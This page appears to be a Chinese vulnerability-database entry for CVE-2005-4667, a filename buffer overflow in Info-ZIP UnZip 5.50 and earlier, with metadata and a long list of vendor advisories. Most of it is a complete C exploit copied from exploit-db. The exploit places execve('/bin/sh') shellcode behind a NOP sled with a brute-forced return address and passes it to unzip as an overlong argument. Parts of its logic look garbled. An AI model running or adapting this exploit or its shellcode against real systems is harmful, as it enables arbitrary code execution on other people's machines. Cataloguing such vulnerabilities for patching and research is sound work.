Info-ZIP UnZip文件名缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109495 漏洞类型 缓冲区溢出
发布时间 2005-12-19 更新时间 2007-09-19
CVE编号 CVE-2005-4667 CNNVD-ID CNNVD-200512-812
漏洞平台 Linux CVSS评分 3.7
|漏洞来源
https://www.exploit-db.com/exploits/26913
https://www.securityfocus.com/bid/15968
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-812
|漏洞详情
UnZip5.50及更早版本存在缓冲区溢出,用户协助式攻击者可以通过长文件名命令行参数来执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/15968/info

Info-ZIP 'unzip' is susceptible to a filename buffer-overflow vulnerability. The application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

This issue allows attackers to execute arbitrary machine code in the context of users running the affected application. 

/*
By DVDMAN (DVDMAN@L33TSECURITY.COM)dvdman@snosoft.com
http://www.snosoft.com
http://WWW.L33TSECURITY.COM
L33T SECURITY
Keep It Private

based on code by hackbox.ath.cx
 > wget http://hackbox.ath.cx/mizc/unzip-expl.c

lame unzip <= 5.50
tested on redhat 7.2
By DVDMAN
L33TSECURITY.COM
*/


#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#define MAX "\x39\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
#define BUF 3264+1900+20000
#define LOC 3262
#define OFFSET 700 // brute force it
char fakechunk[] = "\xf0\xff\xff\xff"
"\xfc\xff\xff\xff"
"\xde\x16\xe8\x77"
"\x42\x6c\xe8\x77";
char execshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89"
"\xc2\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\x40"
"\xcd\x80"; /* newroot's shellcode */

int
main (int argc, char *argv[])
{

char buf[BUF + 1];
int x;
char *ptr;
int i=0,offset=OFFSET;
unsigned long addy = 0xbffffab0;
if (argc < 2) {
printf("[L33TSECURITY]");
printf("UNZIP EXPLOIT BY DVDMAN ");
printf("[L33TSECURITY]\n");
printf("[Usage] %s Offset\n",argv[0]);
return;
}
if (argc > 1) offset = atoi(argv[1]);

memset(buf,0x90,BUF);
ptr = buf + ((BUF) - strlen(execshell));

for (i=0;i<strlen(execshell);i++)
*(ptr++) = execshell[i];

*(long*)&buf[LOC] = addy + offset;
*(long*)&buf[LOC+4] = addy + offset;

buf[BUF] = 0;
if (buf < MAX) {
x = atoi(fakechunk + 2);
memset(buf,x,BUF);
execl("/usr/bin/unzip","unzip",buf,NULL);
}
execl("/usr/bin/unzip","unzip",buf,fakechunk,NULL);
return;
}
|受影响的产品
Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 5.0 4 powerpc Ubuntu Ubuntu Linux 5.0 4 i386 Ubuntu Ubuntu
|参考资料

来源:UBUNTU
名称:USN-248-2
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-248-2
来源:UBUNTU
名称:USN-248-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-248-1
来源:TRUSTIX
名称:2006-0006
链接:http://www.trustix.org/errata/2006/0006
来源:FEDORA
名称:FLSA:180159
链接:http://www.securityfocus.com/archive/1/archive/1/430300/100/0/threaded
来源:DEBIAN
名称:DSA-1012
链接:http://www.debian.org/security/2006/dsa-1012
来源:BID
名称:15968
链接:http://www.securityfocus.com/bid/15968
来源:REDHAT
名称:RHSA-2007:0203
链接:http://www.redhat.com/support/errata/RHSA-2007-0203.html
来源:OSVDB
名称:22400
链接:http://www.osvdb.org/22400
来源:SECUNIA
名称:25098
链接:http://secunia.com/advisories/25098
来源:FULLDISC
名称:20051219Unzip*ALL*verisons;))
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-12/0930.html
来源:MANDRIVA
名称:MDKSA-2006:050
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2006:050